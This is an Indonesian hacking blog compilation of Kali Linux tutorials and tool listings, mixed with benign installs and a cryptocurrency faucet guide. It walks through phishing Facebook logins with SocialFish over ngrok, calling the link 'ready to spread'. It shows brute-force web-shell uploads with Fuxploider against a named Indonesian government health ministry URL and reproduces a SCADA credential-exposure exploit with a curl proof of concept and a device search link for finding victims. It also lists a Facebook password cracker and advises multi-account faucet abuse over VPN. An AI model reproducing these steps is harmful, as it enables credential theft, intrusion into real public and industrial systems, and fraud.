Kali Linux : Setting Archerysec Vulnerability Assessment and Management Tool

Halo kang coli kembali lagi dengan gw yukinoshita 47 kali ini gw mau share tutorial lagi wkwkwkwkwkwk oke langsung saja pada inti nya

Archerysec adalah tool management berbasis web untuk mangaudit celah keamanan Archerysec menggunakan tool opensource populer untuk melakukan pemindaian komprehensif untuk aplikasi web dan jaringan. 

Archerysec Ini juga melakukan pemindaian otentikasi dinamis aplikasi web dan mencakup seluruh aplikasi dengan menggunakan selenium dan juga dapat memanfaatkan alat untuk implementasi lingkungan DevOps CI / CD mereka.

berikut ini kerangka atau architecture dari tool ini

baiklah gays langsung saja kita mulai step by step nya

pertama buka dulu terminal

kemudian clone tools nya dari github dengan menggunakan perintah

git clone https://github.com/archerysec/archerysec.git

kemudian tekan enter

setelah itu masuk ke direktori archerysec nya dengan menggunakan perintah

cd archerysec

kemudian tekan enter

install module dan dependencies nya agar tool ini berjalan dengan baik dengan menggunakan perintah

pip install -r requirements.txt

kemudian tekan enter

biarkan proses install module dan dependencies nya berjalan hingga selesai

kemudian jalankan tools nya dengan menggunakan perintah

./run.sh

kemudian tekan enter

dan maka akan muncul server nya contoh disini server nya http://0.0.0.0:8000/

lalu akses http://0.0.0.0:8000/ di browser

lalu pilih sign up dan isi username, email, dan password kalian lalu klik lagi sign up

contoh :

username : root
email : root@localhost.io
password : toor
confirm password : toor

kemudian login dengan akun sesuai yang kalian daftar tadi disini gw login dengan akun username : root password : toor

dan berhasil ini lah penampakan interface tool nya

untuk menutup nya cukup logout >> close browser nya >> dan tekan CTRL + C di terminal

oke cukup sampai disini dulu tutorial nya mungkin akan ada tutorial lanjutan nya stay tuned aja wkwkwkwkwkwk

Tetaplah bersama dan saling membantu :*

Kali Linux : Cara Install Telegram

Halo kang coli wkwkwkwk coli mulu kerjaan lu udah berhenti dulu coli nya kali ini gw Yukinoshita 47 HAMBA ALLAH YANG MENCARI RIDHO NYA mau sharing tutorial sederhana yaaa buat ngisi blog aja biar suasana blog hidup gitu :v

kali ini gw mau share tutorial Install Telegram lumayan buat nuyul-nuyul airdrop bitcoin wkwkwkwkwkwkwkwk

pertama buka web resmi Telegram nya di https://telegram.org/ 

trus lu download Software nya kalo gw disini pake Kali Linux 64 Bit jadi gw download yang 64 bit aja

setelah itu buka file manager dan masuk ke direktori file telegram yang di download tadi kalo gw disini letaknya di Folder Download setelah itu gw klik kanan file nya trus extract

maka akan muncul seperti gambar dibawah ini

 langsung aja masuk ke folder nya setelah itu klik kanan dan pilih Open In Terminal untuk membuka terminal

 dan terminal pun muncul wkwkwkwkw

kita copy aja file Telegram dan Updater nya ini ke folder /usr/bin nya

dengan memasukkan perintah

cp Telegram Updater /usr/bin

kemudian tekan enter

setelah itu beri hak ases kepada file Telegram dan Updater yang dicopy tadi agar bisa dijalankan software nya dengan menggunakan perintah

chmod +x /usr/bin/Telegram

kemudian tekan enter

setelah itu kita berikan juga hak akses di file updater nya dengan menggunakan perintah yang sama

chmod +x /usr/bin/Updater

kemudian tekan enter

setelah itu untuk menjalankan software telegram ini cukup memasukkan perintah Telegram saja di terminal kemudian tekan enter

dan telegram pun berhasil dijalankan dan siap untuk digunakan :v

baiklah cukup sampai disini aja tutorial nya lebih dan kurang mohon maaf dan maklumin aja wkwkwkwkkwkw


sekian dan terimakasih

Kali Linux : Arbitrary File Upload Vulnerability Scanning Dengan Fuxploider

Hai gays kembali lagi bersama gw yukinoshita47 kali ini gw mau share tutorial lagi kali ini tutorial tentang Vulnerability Analysis yang mungkin cocok buat wajah-wajah tukang upload shell kayak lu pade wkwkwkwkwkwk

oke langsung aja

pertama buka terminal

kemudian download tools nya dari github dengan menggunakan perintah

git clone https://github.com/almandin/fuxploider

kemudian tekan enter

kemudian masuk ke dalam direktori tools nya dengan menggunakan perintah

cd fuxploider

kemudian tekan enter

kemudian install dulu python3-pip nya

khusus untuk kali linux versi lama atau versi dibawah tahun 2018

gunakan perintah

apt-get install python3-pip

kemudian tekan enter

---

khusus untuk kali linux 2018 dan yang terbaru

gunakan perintah

apt install python3-pip

kemudian tekan enter

kemudian install dependencies nya dengan menggunakan perintah

pip3 install -r requirements.txt

kemudian tekan enter

setelah selesai install dependencies nya
jalankan tools nya dengan menggunakan perintah

python3 fuxploider.py

kemudian tekan enter

untuk melihat informasi tools gunakan perintah

python3 fuxploider.py -h

kemudian tekan enter

lalu bagaimana cara gunakan tools nya untuk uji coba target nya ?

kita test

cara nya gunakan perintah

python3 fuxploider.py --url http://situstarget.com/letak-file-upload.php --not-regex "wrong file type"

contoh

python3 fuxploider.py --url http://www.itjen.depkes.go.id/public/filemanager/img/ico_dark/uploader.php --not-regex "wrong file type"

kemudian tekan enter maka tool nya akan coba validasi extensi file yang akan di upload

tekan y untuk coba bruteforce upload file shell nya

contoh jika bruteforce upload shell nya berhasil akan muncul seperti gambar dibawah ini

oke cukup sampai disini tutorial kali ini gays kalo ada salah dan kurang dimaklumi aja gays  sampai jumpa di tutorial selanjutnya

sekian dan terimakasih

regard

Drs. Yukinoshita47. HAMBA ALLAH YANG MENCARI RIDHO NYA

Kali Linux : Tutorial Phising Menggunakan SocialFish yang Terintregasi Langsung Oleh Ngrok

hai gay's halo anjing wkkwkwkwk kembali lagi ama gw Yukinoshita 47kali ini gw membuat tutorial lagi kali ini gw bikin tutorial hack akun social media melalui phising dengan Social Fish oke langsung saya kita mulai

kali ini gw menggunakan Platform OS nya Kali Linux 2018.2 akhirnya gw bisa move on dari Kali Linux 1.1.0 a wkwkwkwkwkwk

pertama buka terminal lu

kemudian masukkan perintah

git clone https://github.com/UndeadSec/SocialFish.git

kemudian tekan enter

masuk ke folder SocialFish nya dengan memasukkan perintah

cd SocialFIsh

kemudian tekan enter

install dependencies yang dibutuhkan tool ini dengan menjalankan perintah

pip install -r requirements.txt

kemudian tekan enter

proses instalasi selesai
setelah itu jalankan tools nya  dengan memasukkan perintah

python SocialFish.py

kemudian tekan enter

setelah konfigurasi nya selesai maka akan muncul seperti gambar dibawah ini

disini tool ini memberitahukan kita bahwa kita harus setuju bahwa penggunaan tools ini hanya untuk pembelajaran dan hanya sekedar mencari ilmu pengetahuan aja bukan untuk kejahatan.

jika ingin lanjut tekan y kemudian tekan enter

disini ada 7 pilihan phising yang bisa kita gunakan

ada Facebook, Twitter, Google, LinkedIn, StackOverflow, Github dan Wordpress

untuk contoh gw mau menggunakan phising facebook

jadi gw tekan 1 kemudian tekan enter

disini ada 2 pilihan jadi gw pilih yang nomor pertama aja dengan cara menekan 1 kemudian tekan enter

kemudian link phising nya berupa ngrok URL akan muncul lebih detail nya cek gambar dibawah ini.

setelah itu kita uji coba link nya ternyata aktif dan siap untuk disebar wkwkwkwkwkwkwk

kita test login disini gw mencoba menggunakan username : korban password nya : phising

dan username dan password akun nya pun kerekam dan muncul di log nya.

 

Mudahkan , menurut gw phising metode ini sangat efektif dan cukup canggih

oke sampai jumpa di tutorial-tutorial berikut nya terimakasih.

SocialFish - Ultimate phishing tool with Ngrok integrated

SocialFish adalah tool untuk phising yang terintregasi langsung oleh ngrok sehingga lebih efektif daripada menggunakan hosting yang selalu membanned laman phising

https://github.com/UndeadSec/SocialFish

FruityWifi v2.4 - Wireless Network Auditing Tool

FruityWifi v2.4 adalah tool Raspberry Pi untuk Hacking WiFi dan Tool ini juga bisa di install di Debian, Kali Linux, Kali Linux ARM (Raspberry Pi), Raspbian (Raspberry Pi), Pwnpi (Raspberry Pi), Bugtraq

more info
https://github.com/xtr4nge/FruityWifi
http://www.fruitywifi.com/index_eng.html

WarBerryPi - Tactical Exploitation

Tool untuk mengubah Raspberry Pi menjadi hacking tools

More info
https://github.com/secgroundzero/warberry

WFacebook : Facebook Password Cracker

WFacebook tool untuk cracking password facebook menggunakan metode bruteforce

https://github.com/s1kr10s/WFacebook

Samurai Email Discovery - SED is a email discovery framework that grabs emails via google dork, company name, or domain name.

Samurai Email Discovery adalah tool  untuk pencarian email melalui google dorking.

More info
https://github.com/0x3curity/Samurai

TheDoc : simple but very useful SQLMAP automator with built in admin finder, hash cracker(using hashcat) and more!

Tool yang sangat sederhana untuk otomatisasi proses hacking dengan metode SQL injection dengan SQLMap, proses pencarian halaman login dan pemecahan hash dan lainnya.

info lebih lanjut
https://github.com/0x3curity/TheDoc

CenoCipher : Crypto Communication Tool

CenoCipher adalah tool enkripsi untuk komunikasi antar jaringan internet sehingga privasi terjaga dan aman dari kebocoran informasi

more info
https://gitlab.com/cenocipher/cenocipher

netpwn : Tool made to automate tasks of pentesting.

tool otomatisasi pentest untuk  mempermudah proses scanning dan pentesting

more info
https://github.com/3XPL017/netpwn

Gitbackdorizer

Gitbackdorizer : adalah sebuah bukti konsep yang menggunakan kurangnya perhatian pengguna untuk mencuri kredensial akses ke git


More info
https://github.com/UnkL4b/GitBackdorizer
https://www.youtube.com/watch?v=ka8uJqaDYOs

Exploit: SCADAS "BAS920 & ISC2000": Credentials Exposed

[*] Exploit Title: "SCADAS "BAS920 & ISC2000"; Credentials Exposed”
[*] CVE: CVE-2017-17974
[*] Date: 29/12/2017
[*] Exploit Author: Fernandez Ezequiel ( @capitan_alfa ) && Bertin Jose ( @bertinjoseb )
[*] Vendor: BA System
[*] devices(tested): BAS920 & ISC2000

PoC:
curl http://<host>/isc/get_sid_js.aspx
tool
usr@pwn:~$ git clone https://github.com/ezelf/baCK_system.git
usr@pwn:~$ cd baCK_system
usage
usr@pwn:~/$ python plinplanplum.py --help
python plinplanplum.py --help
usage: plinplanplum.py [-h] [-v] --host HOST [--port PORT]
[+] Obtaining all credentials for the Supervisor/Administrator account
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
--host HOST Host
--port PORT Port
[+] Demo: python plinplanplum.py --host 192.168.1.101 -p 81
Search Devices vicitms:
https://www.zoomeye.org/searchResult?q=HTTPserv&t=host
https://github.com/ezelf/baCK_system

From : https://www.facebook.com/Ksecureteam/

Fireshodanmap: peta real - time yang terintegrasi firebase, Google Maps dan shodan

Fireshodanmap adalah peta real time yang terintegrasi firebase dan shodan. Melakukan pencarian menggunakan shodan mencari perangkat yang rentan dan ditampilkan pada peta untuk analisis anda. Semua data diperbarui di firebase adalah real time.


More Info :





https://github.com/Warflop/FireShodanMap

Trik Nambang Bitcoin dan Altcoin Tanpa Modal Via Eobot

 Hai gays :v kali ini gw mau share sesuatu yang berbeda yaitu mengenai seluk beluk nya crypto currency apa itu crypto currency penjelasan detail nya nanti di artikel2 lainnya.

artikel kali ini adalah mengenai nambang bitcoin :v kali ini nambang bitcoin metode cloud mining yang umum nya harus invest tapi di eobot kita juga bisa nambang tanpa harus ngeluarin modal bagaimana cara nya simak langkah-langkah nya

Pertama kalian harus punya wallet / dompet buat nampung coin kalian bisa kalian bikin wallet melalui https://coinbase.com , https://indodax.com/ atau penyedia layanan wallet lainnya

Registrasi Akun Eobot kalian dulu disini https://bit.ly/2jKwGh6

setelah itu pilih mining lalu pilih GHS 4.0

lalu akan muncul seperti gambar dibawah ini

kemudian pilih faucet

isi captcha lalu klik Get Faucet Reward

dan kalian langsung dapat GHS4CONTRACT nya seperti gambar dibawah ini

lalu pilih account

kemudian pilih mining dan pilih jenis coin yang ingin kalian tambang misalnya disini gw mau nambang DOGE maka gw pilih DOGE

dan proses nambang DOGE pun berjalan dengan kecepatan nambang nya sesuai dengan jumlah GHS4CONTRACT yang dimiliki

setelah itu kalian bisa logout dan tinggalin aja karena nambang dari cloud ini berjalan secara otomatis dan lakukan trik ini setiap hari agar bisa cepat WD.

apakah bisa dituyul ??
ya bisa dituyul pastikan kalian menggunakan VPN sehingga tiap akun IP nya berbeda agar pengambilan faucet nya lancar.

oke sampai disini dulu artikel tentang crypto currency nya dan tentu saja akan ada artikel dan informasi lainnya yang akan diupdate secara berkala

sekian dan terimakasih